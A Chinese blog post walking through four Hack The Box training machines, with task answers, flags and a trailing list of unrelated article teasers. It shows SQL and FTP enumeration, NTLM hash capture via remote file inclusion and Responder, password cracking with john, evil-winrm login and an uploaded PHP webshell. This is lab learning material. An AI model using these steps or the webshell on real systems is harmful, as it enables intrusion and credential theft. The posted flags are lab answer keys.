渗透测试学习day4
文章目录
- 靶机:Sequel
- Task1
- Task2
- Task3
- Task4
- Task5
- Task6
- Task7
- Task8
- 靶机:Crocodile
- Task1
- Task2
- Task3
- Task4
- Task5
- Task6
- Task7
- Task8
- Task9
- Task10
- 靶机:Responder
- Task1
- Task2
- Task3
- Task4
- Task5
- Task6
- Task7
- Task8
- Task9
- Task10
- Task11
- 靶机:Three
- Task1
- Task2
- Task3
- Task4
- Task5
- Task6
- Task7
- Task8
- Task9
- Task10
靶机:Sequel
考察sql注入
Task1
问题:在扫描过程中,我们发现哪个端口为 MySQL 提供服务?
3306
nmap扫描一下,如果不确定扫到哪可以用参数-v
sudo nmap -sV -sC -v 10.129.190.194
Task2
问题:目标正在运行哪个社区开发的 MySQL 版本?
MariaDB
前一题可以看version,发现是MariaDB
Task3
问题:使用MySQL命令行客户端时,我们需要使用什么开关来指定登录用户名?
-u
Task4
问题:哪个用户名允许我们在不提供密码的情况下登录此 MariaDB 实例?
root
Task5
问题:在 SQL 中,我们可以使用什么符号在查询中指定要显示表中的所有内容?
*
Task6
问题:在SQL中我们需要用什么符号来结束每个查询?
;
Task7
问题:此 MySQL 实例中存在三个在所有 MySQL 实例中通用的数据库。该主机独有的第四个名字是什么?
htb
使用mysql以root用户连接数据库
sudo mysql -h 10.129.190.194 -u root
然后查询数据库
show databases;
Task8
问题:提交flag
7b4bec00d1a39e3dd4e021ec3d915da8
我们先使用数据库
use htb;
然后查询config表,得到flag
靶机:Crocodile
考察的是FTP传输协议相关知识
Task1
问题:在扫描过程中,什么NMAP扫描开关使用默认脚本?
-sC
Task2
问题:发现端口 21 上运行的服务版本是什么?
vsftpd 3.0.3
使用nmap的参数-sC
sudo nmap -sV -sC -v 10.129.1.15
Task3
问题:对于“允许匿名 FTP 登录”消息,我们会返回什么 FTP 代码?
230
Task4
问题:使用FTP客户端连接到FTP服务器后,当提示匿名登录时,我们提供什么用户名?
Anonymous
由前一题扫描信息第一行可以得知
Task5
问题:匿名连接到FTP服务器后,我们可以使用什么命令下载在FTP服务器上找到的文件?
get
Task6
问题: 我们从FTP服务器下载的“allowed.userlist”中听起来权限更高的用户名是什么?
admin
我们下载下来
get allowed.userlist
Task7
问题: 目标主机上正在运行哪个版本的Apache HTTP Server?
Apache httpd 2.4.41
nmap扫描结果有
Task8
问题:我们可以在Gobuster中使用什么开关来指定我们正在寻找特定的文件类型?
-x
我们尝试用其他用户名登录发现不行
又知道该ip存在80端口的http服务
我们用前面靶机使用过的工具gobuster去爆破
gobuster dir --url 10.129.1.15 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html
Task9
问题:我们可以用目录暴力识别哪个PHP文件,从而提供向web服务进行身份验证的机会?
login.php
由前一题可知
Task10
提交flag
c7110277ac44d78b6a9fff2232434d16
发现存在login.php,拿得到的用户名admin登陆一下
靶机:Responder
考察的是WinRM服务
Task1
问题:当使用IP地址访问web服务时,我们被重定向到的域是什么?
unika.htb
Task2
问题:服务器上正在使用哪种脚本语言来生成网页?
PHP
由于访问不到,我们可以用vim编辑器修改hosts文件,将机器IP指向unika.htb,重新访问
sudo vim /etc/hosts
然后输入a启用编辑模式,添加上去
然后esc退出,输入:启用末行模式,最后输入wq保存并退出
然后nmap扫描发现是php服务
Task3
问题: 用于加载不同语言版本网页的URL参数的名称是什么?
page
点击EN可以修改语言,可以知道参数为page
Task4
问题:“page”参数的以下哪个值是利用本地文件包含(LFI)漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“…/…/…/…/…/windows/system32/drivers/etc/hosts”、“minikatz.exe”
../../../../../windows/system32/drivers/etc/hosts
很明显的目录穿越实现本地文件包含
Task5
问题:“page”参数的以下哪个值是利用远程文件包含(RFI)漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“…/…/…/…/…/windows/system32/drivers/etc/hosts”、“minikatz.exe”
//10.10.14.6/somefile
远程文件包含漏洞
Task6
问题:NTLM代表什么?
New Technology LAN Manager
Task7
问题:我们在Responder工具中使用哪个标志来指定网络接口?
-I
Task8
问题:有几种工具可以接受 NetNTLMv2 质询/响应,并尝试数百万个密码,以查看其中是否有任何密码生成相同的响应。一个这样的工具通常被称为“john”,但全名是什么?
John The Ripper
Task9
问题: 管理员用户的密码是什么?
badminton
获取方法如下
我们先查看自己ip地址
ifconfig
然后选择tun0
修改url的ip进行远程文件包含
然后抓包
sudo responder -I tun0
接着访问我们修改过后的url,回到终端就能看到NTLM hash了
复制整个hash值,退出抓包,把hash值存入文件
然后用john和kali自带的字典破解
john -w=/usr/share/wordlists/rockyou.txt hash.txt
Task10
问题:我们将使用 Windows 服务(即在机器上运行)使用我们恢复的密码远程访问响应程序计算机。它侦听什么端口 TCP?
5985
用nmap扫描全部端口
Task11
问题:提交flag
ea81b7afddd03efaa0945333ed147fac
步骤如下
我们先修改下扫描参数-sV,然后扫出来wsman服务(即windows远程管理的端口)
那么我们使用工具evil-winrm连接
evil-winrm -i 10.129.152.77 -u administrator -p badminton
得到flag
靶机:Three
考察的是AWS服务
Task1
问题:打开了多少个TCP端口?
2
nmap扫一下
Task2
问题: 网站“联系人”部分提供的电子邮件地址的域是什么?
thetoppers.htb
登录该ip,拉到网页最下面找到
Task3
问题:在没有DNS服务器的情况下,我们可以使用哪个Linux文件将主机名解析为IP地址,以便能够访问指向这些主机名的网站?
/etc/hosts
Task4
问题:在进一步枚举期间发现哪个子域?
s3.thetoppers.htb
步骤如下
gobuster vhost -u http://thetoppers.htb/ -w /usr/share/wordlists/dirb/big.txt --append-domain
发现有个404状态的,猜测就是
Task5
问题:发现的子域上运行的是哪个服务?
amazon s3
将该域名添加到/etc/hosts,访问http://s3.thetoppers.htb/
Task6
问题:哪个命令行实用程序可以用于与在发现的子域上运行的服务交互?
awscli
Task7
问题:哪个命令用于设置AWS CLI安装?
aws configure
Task8
问题:上述实用程序使用什么命令列出所有 S3 存储桶?
aws s3 ls
Task9
问题:此服务器配置为运行用何种web脚本语言编写的文件?
PHP
Task10
问题:提交flag
a980d99281a28d638ac68b9bf9453c2b
解题过程
使用命令通过指定的 S3 端点连接到 s3.thetoppers.htb,然后列出 thetoppers.htb 存储桶中的对象
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
接着我们在本地写个马
echo '<?php system($_GET["cmd"]); ?>' > shell.php
传马
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
成功写入
然后访问http://thetoppers.htb/shell.php命令执行得到flag
相关文章:
渗透测试学习day4
文章目录 靶机:SequelTask1Task2Task3Task4Task5Task6Task7Task8 靶机:CrocodileTask1Task2Task3Task4Task5Task6Task7Task8Task9Task10 靶机:ResponderTask1Task2Task3Task4Task5Task6Task7Task8Task9Task10Task11 靶机:ThreeTas…...
Deepin使用记录-deepin系统下安装RabbitMq
目录 0、引言 1、由于RabbitMq是erlang语言开发的,所有需要先安装erlang 2、更新源并安装RabbitMq 3、安装完成之后,服务是启动的,可以通过以下语句查看状态 4、这样安装完成之后,是看不到web页面的,需要再安装一…...
【腾讯云云上实验室】用向量数据库——实现高效文本检索功能
文章目录 前言Tencent Cloud VectorDB 简介Tencent Cloud VectorDB 使用实战申请腾讯云向量数据库腾讯云向量数据库使用步骤腾讯云向量数据库实现文本检索 结论和建议 前言 想必各位开发者一定使用过关系型数据库MySQL去存储我们的项目的数据,也有部分人使用过非关…...
Pytorch中的gather的理解和用法
Pytorch中的gather的理解和用法 这个Gather的用法花费了点时间,我相信很多人一开始不太懂。 跟着我简单理解。 首先样例是: tensor([[ 3, 4, 5],[ 6, 7, 8],[ 9, 10, 11]])然后index: [[2, 1, 0]]然后执行的代码: tensor_0.gather(0…...
唯创知音WTN6系列语音芯片:高音频采样率与精细音量控制赋能广泛应用
在语音芯片领域,唯创知音的WTN6系列语音芯片以其出色的性能和广泛的应用领域,无疑是行业的一颗璀璨明星。近期,该系列芯片实现了音频采样率32kHz的突破,以及16级音量控制的精细调节,进一步提升了其在各类应用中的表现。…...
机器人分类
从发展阶段分类: 1第一代机器人2第二代机器人3第三代机器人:智能型机器人。生于90年代。具有传感器,以前的机器人都不具有传感器 从控制方式分类:(我觉得这个分类好乱) 操作型机器人:可自动控…...
html/css中位置position的绝对位置absolute顺时针盒子案例图片排序
目标图片: Dreamweaver界面: 代码部分: <!doctype html> <html> <head> <meta charset"utf-8"> <title>无标题文档</title> <style type"text/css">.red{background-color:r…...
分享86个清新唯美PPT,总有一款适合您
分享86个清新唯美PPT,总有一款适合您 86个清新唯美PPT下载链接:https://pan.baidu.com/s/1QEaXeWAekCbAWDD0iTgvMw?pwd8888 提取码:8888 Python采集代码下载链接:采集代码.zip - 蓝奏云 学习知识费力气,收集整…...
虚拟机系列:Oracle VM VirtualBox安装/更新/卸载出现 无法访问你试图使用的功能所在的网络位置
Oracle VM VirtualBox安装/更新/卸载出现 无法访问你试图使用的功能所在的网络位置 Oracle VM VirtualBox安装/更新/卸载出现 无法访问你试图使用的功能所在的网络位置Oracle VM VirtualBox安装/更新/卸载出现 无法访问你试图使用的功能所在的网络位置 在更新Oracle VM Virtua…...
【数据库】数据库并发控制的冲突检测,冲突可串行化的调度,保障事务的特性
冲突可串行化 专栏内容: 手写数据库toadb 本专栏主要介绍如何从零开发,开发的步骤,以及开发过程中的涉及的原理,遇到的问题等,让大家能跟上并且可以一起开发,让每个需要的人成为参与者。 本专栏会定期更新…...
java 对象大小计算
说明: 对于64位机:一个对象由三部分组成 对象头(object header) mark word :64bitkclass pointer :32bit(默认使用指针压缩),如果取消指针压缩( XX:-UseCompressedOops),则占用64bit数组长度:数…...
12个国外电子元器件基本参数(下)
DAC8162SDSCR TI DAC088S085CISQNOPB TI TL4050C41QDBZR TI NE3516S02-T1D-A RENESAS TECHNOLOGY MXL862-AL-R MAXLINEAR SI32176-B-GM1R SILICON LAB...
Docker容器中的OpenCV:轻松构建可移植的计算机视觉环境
前言 「作者主页」:雪碧有白泡泡 「个人网站」:雪碧的个人网站 构建可移植的计算机视觉环境 文章目录 前言引言简介:目的和重要性: 深入理解Docker和OpenCVDocker的基本概念和优势:OpenCV简介和应用领域:…...
SSH基础和高级用法
SSH基础和高级用法 SSH(Secure Shell)是一种安全协议,用于在不安全的网络上提供安全的远程登录和数据传输。以下是一些SSH的用法和高级用法: 基本用法: 远程登录:使用ssh命令可以实现在本地计算机上远程…...
算法通关第十三关-青铜挑战数学基础问题
数组元素积的符号 描述 : 已知函数 signFunc(x) 将会根据 x 的正负返回特定值: 如果 x 是正数,返回 1 。如果 x 是负数,返回 -1 。如果 x 是等于 0 ,返回 0 。 给你一个整数数组 nums 。令 product 为数组 nums 中所有元素值的…...
如何使用 Freepik 的 Pikaso 工具来画图
Freepik 是一个提供高质量的照片、矢量图像、插图以及 PSD 文件素材的网站https://www.freepik.com/您可以在这里找到各种风格和主题的素材,用于您的创意项目。Freepik 还提供了一个名为 Pikaso 的在线画图工具,让您可以轻松地创建和编辑您自己的图像&am…...
一个没正常处理tcp对端关闭的bug
最近使用自研的http client时发现一个问题,对端在发送响应数据之后立即调用close关闭了连接,我这没有调用到响应的回调,而是调用到了连接关闭的回调。对端延迟一会再关闭连接就没问题,用curl去访问也是正常的。经过排查是没有正确…...
什么是JDK
JDK是Java的开发工具,全称为Java Development Kit,包含Java运行环境,Java工具,Java基础类库三大部分。 Java运行环境 Java运行环境,也就是JRE,全称为Java Runtime Environment ,其中包含JVM&…...
积分表二(高等数学同济版中所有的积分公式)
文章目录 含有 x − a x a \sqrt{\pm \frac{x-a}{xa}} xax−a 或者 ( x − a ) ( b − x ) \sqrt{(x-a)(b-x)} (x−a)(b−x) 的积分含有三角函数函数的积分含有反三角函数的积分 (其中 a > 0 a>0 a>0)含有指数函数的积分含有对数函数的积分含有双曲函数的…...
Golang数据类型(数字型)
Go数据类型(数字型) Go中数字型数据类型大致分为整数(integer)、浮点数(floating point )和复数(Complex)三种 整数重要概念 整数在Go和Python中有较大区别,主要体现在…...
【JVM系列】- 穿插·对象的实例化与直接内存
对象的实例化与直接内存 😄生命不息,写作不止 🔥 继续踏上学习之路,学之分享笔记 👊 总有一天我也能像各位大佬一样 🌝分享学习心得,欢迎指正,大家一起学习成长! 文章目录…...
【C++干货铺】继承 | 多继承 | 虚继承
个人主页点击直达:小白不是程序媛 C系列专栏:C干货铺 代码仓库:Gitee 目录 继承的概念及定义 继承的概念 继承的定义 继承基类成员访问方式的变化 基类和派生类的赋值转化 继承中的作用域 派生类的默认成员函数 构造函数 拷贝构造…...
【ARM CoreLink 系列 8.1 -- SMMU 详细介绍-STE Entry 详细介绍 1】
请阅读【ARM CoreLink 文章专栏导读】 上篇文章:【ARM CoreLink 系列 8 – SMMU 详细介绍-上半部】 文章目录 ARM SMMU STE ENTRY1.1 STE ENTRYWORD[0]1.1.1 S1ContexPtr1.1.2 S1Fmt1.1.3 Config1.1.4 V(Valid)1.2 STE ENTRY WORD[1]1.2.1 S1CDMax1.2.2 S1ContextPtr1.3 STE E…...
高防CDN与WAF防火墙的协同防护:构筑网络安全堡垒
随着互联网的不断发展,网络安全威胁也日益增多,而网站作为企业在数字领域的门户,面临的风险更加复杂多样。在构筑网络安全堡垒的过程中,高防CDN(Content Delivery Network)与WAF(Web Applicatio…...
golang strings包的基本操作
文章目录 golang 的字符串函数EqualFoldHasPrefixHasSuffixContainsContainsRuneContainsAnyCountIndexIndexByteIndexRuneIndexAnyIndexFuncLastIndexLastIndexAnyLastIndexFuncTitleToLowerToLowerSpecialToUpperToUpperSpecialToTitleToTitleSpecialRepeatReplaceMapTrimTri…...
高效解决在本地打开可视化服务器端的tensorboard
文章目录 问题解决方案 问题 由于连着远程服务器构建模型,但是想在本地可视化却做不到,不要想当然天真的以为CTRLC点击链接http://localhost:6006就真能在本地打开tensorboard。你电脑都没连接服务器,只是pycharm连上了而已 解决方案 你需要…...
Spring Boot Actuator 2.2.5 基本使用
1. pom文件 ,添加 Actuator 依赖 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</artifactId> </dependency> 2.application.properties 文件中添加以下配置 …...
字符串相似度匹配算法_莱茵斯坦距离算法
package day0330;public class LevenshteinDistanceUtil {public static void main(String[] args) {String a "WN64 F98";String b "WN64 F98 ";System.out.println("相似度:" getSimilarityRatio(a, b));}/*** 获取两字符串的相似度* * par…...
【EI会议征稿】第九届电气、电子和计算机工程研究国际学术研讨会 (ISAEECE 2024)
第九届电气、电子和计算机工程研究国际学术研讨会 (ISAEECE 2024) 2024 9th International Symposium on Advances in Electrical, Electronics and Computer Engineering 第九届电气、电子和计算机工程研究国际学术研讨会(ISAEECE 2024)将于2024年3月1-5日在南…...
Maven Helper插件——实现一键Maven依赖冲突问题
总结/朱季谦 业余在一个SpringBoot项目集成Swagger2时,启动过程一直出现以下报错信息—— An attempt was made to call a method that does not exist. The attempt was made from the following location: springfox.documentation.schema.DefaultModelDepe…...